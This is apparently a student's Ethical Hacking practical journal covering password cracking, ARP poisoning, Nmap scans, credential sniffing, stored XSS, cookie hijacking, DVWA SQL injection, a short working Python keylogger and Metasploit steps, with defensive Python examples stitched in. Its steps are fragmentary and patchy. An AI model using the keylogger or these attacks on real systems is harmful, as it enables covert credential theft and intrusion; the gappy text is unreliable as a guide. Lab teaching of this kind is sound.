EH Journal
Science College
Bandra, Mumbai – 400050.
CERTIFICATE
This is to certify that Mr. Aryan Gupta of T.Y.B.Sc (Computer Science) class (VI Semester) bearing Roll
subject of Ethical Hacking a part of B.Sc. in Computer Science Program during the academic year
2023 – 2024.
Date of Certification:
Step 2: Enter the website name and hit the “Enter button”.
Step 3: Information about www.prestashop.com is displayed.
PRACTICAL NO. 2
2.1) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm.
Using tools like CrypTool and Cain & Abel to explore password encryption and cracking provides a valuable
learning experience in understanding the strengths and weaknesses of cryptographic methods and
password security. Below, I outline how you can use these tools in an ethical hacking context to
encrypt and then attempt to crack passwords. This practical is designed for educational purposes to
better understand and improve cybersecurity measures.
Step 1:
Step 2 : Using RC4.
Decryption
2.2) Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode
wireless network passwords
e.g. (MD5)
Then right-click on the file, select (Add to List), and then select the Wordlist.
Select all the options and start the dictionary attack.
PRACTICAL NO. 3
Ifconfig
Netstat
3.2) Perform ARP Poisoning in Windows
AIM : Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS.
Port scanning is a fundamental technique in ethical hacking used to determine which ports on a
networked system are open, closed, or filtered. This process helps identify active services and potentially
vulnerable points on a target system. Nmap (Network Mapper) is one of the most popular and powerful
tools used for port scanning and network discovery.
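The scan types named in the aim differ in which TCP flags the probe carries: SYN alone, ACK alone, FIN alone, no flags (NULL), or FIN+PSH+URG (XMAS). The following Python example is added here and is not part of the original journal; it shows how a defender's sensor can label such probes and flag a source that sends them to several ports. The function names, the port threshold and the sample packets are constructed for illustration.

```python
# Added example, not part of the journal: classify TCP probes by their flag bits.
from collections import defaultdict

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

def probe_type(flags):
    """Return the scan type whose probe carries exactly these flags, else None."""
    flags &= 0x3F                       # ignore ECE/CWR
    patterns = {
        0: "NULL",                      # no flags set
        FIN: "FIN",
        FIN | PSH | URG: "XMAS",
        SYN: "SYN",                     # also an ordinary connection attempt
        ACK: "ACK",                     # also ordinary traffic on an open flow
    }
    return patterns.get(flags)

def detect_scans(packets, min_ports=3):
    """Group probes by (source, type); report sources hitting >= min_ports ports.

    packets: iterable of (src_ip, dst_port, tcp_flags) for segments that do not
    belong to a connection the sensor already tracks (assumption of this example).
    """
    ports = defaultdict(set)
    for src, dport, flags in packets:
        kind = probe_type(flags)
        if kind is not None:
            ports[(src, kind)].add(dport)
    return {k: sorted(v) for k, v in ports.items() if len(v) >= min_ports}

# Constructed sample capture (documentation addresses, not real traffic).
SAMPLE = [
    ("192.0.2.10", 22, 0x00), ("192.0.2.10", 80, 0x00), ("192.0.2.10", 443, 0x00),
    ("192.0.2.20", 21, 0x29), ("192.0.2.20", 22, 0x29),
    ("192.0.2.20", 23, 0x29), ("192.0.2.20", 25, 0x29),
    ("198.51.100.5", 443, SYN),          # one SYN to one port: normal client
    ("198.51.100.7", 51514, SYN | ACK),  # handshake reply: matches no probe type
]

if __name__ == "__main__":
    for (src, kind), hit in detect_scans(SAMPLE).items():
        print(f"{src}: {kind} probes to ports {hit}")
```

Because a lone SYN or ACK is also normal traffic, those two labels only mean something together with the distinct-port count.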
NOTE: Install Nmap for Windows. After that, open cmd and type “nmap” to check that it is
installed properly. Now type the commands below.
Step 3: In Capture interface, Select Local Area Connection and click on start.
Step 4: The source, Destination and protocols of the packets in the LAN network are displayed.
Step 5: Open a website in a new window and enter the user id and password. Register if needed.
Step 6: Enter the credentials and then sign in.
Step 11: You will see the email ID and password that you used to log in.
DOS
Using NEMESIS
PRACTICAL NO. 6
AIM: Simulate persistent Cross Site Scripting attack.
Persistent XSS is a type of security vulnerability found in web applications where the attacker injects
malicious scripts into user input fields, such as text boxes or comment sections, which are then stored on
the server-side and displayed to other users when they visit the affected page. Unlike reflected XSS,
where the injected script is reflected off the web server, persistent XSS persists over time because the
malicious script is permanently stored on the server.
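The store-then-display flow described above, as an added Python example that is not part of the original journal: the same stored comment is rendered once by pasting it into the page and once with output encoding, and an audit helper lists stored rows that already contain markup. The CommentStore class, the function names and the sample comments are constructed for illustration.

```python
# Added example, not part of the journal: stored input rendered unsafely vs. escaped.
import html

class CommentStore:
    """Stands in for the server-side database table that keeps user comments."""
    def __init__(self):
        self._rows = []

    def add(self, author, body):
        self._rows.append((author, body))    # stored exactly as submitted

    def rows(self):
        return list(self._rows)

def render_vulnerable(store):
    # Stored text is pasted into the page as markup, so it runs for every viewer.
    return "\n".join(f"<li><b>{a}</b>: {b}</li>" for a, b in store.rows())

def render_escaped(store):
    # Output encoding: stored text is shown as text, never interpreted as HTML.
    return "\n".join(
        f"<li><b>{html.escape(a)}</b>: {html.escape(b)}</li>"
        for a, b in store.rows()
    )

def rows_with_markup(store):
    """Audit helper: indexes of stored rows that contain HTML metacharacters."""
    return [i for i, (a, b) in enumerate(store.rows())
            if html.escape(a + b) != a + b]

def demo_store():
    store = CommentStore()
    store.add("alice", "Nice article!")
    store.add("mallory", "<script>alert(1)</script>")   # constructed test marker
    return store

if __name__ == "__main__":
    s = demo_store()
    print(render_vulnerable(s))
    print(render_escaped(s))
    print("rows to review:", rows_with_markup(s))
```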
PRACTICAL NO. 7
AIM: Session impersonation using Firefox and Tamper Data add-on
Session impersonation, also known as session hijacking or session fixation, is a type of cyber attack where
an unauthorized party gains control over a user's session on a web application. In a typical web application
session, a user is assigned a unique identifier, often in the form of a session ID or token, upon
authentication. This identifier is used to track the user's interactions with the application until they log out
or the session expires.
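The session lifecycle described above (an identifier issued on authentication and honoured until logout or expiry), as an added Python example that is not part of the original journal. It shows the server-side controls that limit how long a copied cookie value stays useful: an unguessable ID, a fresh ID at login, expiry, and removal at logout. The SessionStore class, its method names and the cookie name are constructed for illustration.

```python
# Added example, not part of the journal: server-side session lifecycle.
import secrets

class SessionStore:
    def __init__(self, ttl_seconds=900):
        self.ttl = ttl_seconds
        self._sessions = {}                       # session ID -> record

    def _issue(self, user, now):
        sid = secrets.token_urlsafe(32)           # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": user, "expires": now + self.ttl}
        return sid

    def start(self, now):
        """Pre-login session; not tied to any user yet."""
        return self._issue(None, now)

    def login(self, old_sid, user, now):
        """Authenticate: discard the pre-login ID and issue a fresh one."""
        self._sessions.pop(old_sid, None)
        return self._issue(user, now)

    def user_for(self, sid, now):
        """Return the user bound to sid, or None if unknown or expired."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        if now >= rec["expires"]:
            del self._sessions[sid]
            return None
        return rec["user"]

    def logout(self, sid):
        self._sessions.pop(sid, None)             # any copy of the ID dies too

def set_cookie_header(sid):
    # HttpOnly hides the cookie from page scripts; Secure keeps it off plain HTTP.
    return f"Set-Cookie: session={sid}; Path=/; HttpOnly; Secure; SameSite=Strict"
```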
A] Session Impersonation
STEPS
1. Open Firefox
2. Go to Tools > Addons > Extension
3. Search and install EditThisCookie or Cookie Import/Export or any other Cookie tool
4. Then click on the cookie extension to get the cookie
5. Open a website and log in, and then click on export cookie
1. Open Firefox
2. Go to Tools > Addons > Extension
3. Search and install Tamper Data
Here you go
PRACTICAL NO. 8
SQL injection (SQLi) is a type of cyber attack that targets the vulnerabilities in a web application's
database layer. It occurs when an attacker injects malicious SQL (Structured Query Language) code into
input fields or parameters used by an application to interact with its database. This injected SQL code can
manipulate the database in unintended ways, potentially allowing the attacker to execute unauthorized
SQL queries, retrieve sensitive data, modify or delete database records, and in some cases, take control
of the entire database server.
Step 7: Go to the security setting option on the left and set the security level to low.
Step 8: Click on the SQL injection option on the left.
Step 9: Write "1" in the text box and click on submit.
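What separates a vulnerable lookup form from a safe one, as an added Python example that is not part of the original journal: the same ID lookup is written once by pasting the input into the SQL text and once with a bound parameter, then both are run with the input "1" from Step 9 and with a constructed test input containing a quote. The table layout, function names and sample rows are assumptions made for the example and use an in-memory SQLite database.

```python
# Added example, not part of the journal: string-built query vs. parameterized query.
import sqlite3

def make_db():
    """In-memory database with three constructed user rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id TEXT PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("1", "Asha", "Rao"), ("2", "Ben", "Ortiz"), ("3", "Chen", "Li"),
    ])
    return conn

def lookup_vulnerable(conn, user_id):
    # Input is pasted into the SQL text, so quotes in it change the query itself.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    # Placeholder binding: the input is only ever a value compared to user_id.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

TAUTOLOGY = "1' OR '1'='1"   # constructed test input for the comparison

if __name__ == "__main__":
    db = make_db()
    for value in ("1", TAUTOLOGY):
        print(repr(value))
        print("  string-built :", lookup_vulnerable(db, value))
        print("  parameterized:", lookup_safe(db, value))
```

With the string-built query the second input returns every row; with the bound parameter it matches no user_id and returns nothing.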
A keylogger is a type of software or hardware device that records every keystroke typed on a computer
keyboard. It can capture keystrokes in real-time and store them locally or transmit them to a remote
location controlled by an attacker.
- -----------------------------------------------------------------------------------
from pynput.keyboard import Key, Listener
import logging

# if no name it gets into an empty string
log_dir = ""

# This is a basic logging function
logging.basicConfig(filename=(log_dir+"key_log.txt"),
                    level=logging.DEBUG,
                    format='%(asctime)s:%(message)s:')

# This is from the library
def on_press(key):
    logging.info(str(key))

# This says, listener is on
with Listener(on_press=on_press) as listener:
    listener.join()
Output: -
PRACTICAL NO. 10
Steps:
Download and open metasploit
Use exploit to attack the host
Create the exploit and add the exploit to the victim’s PC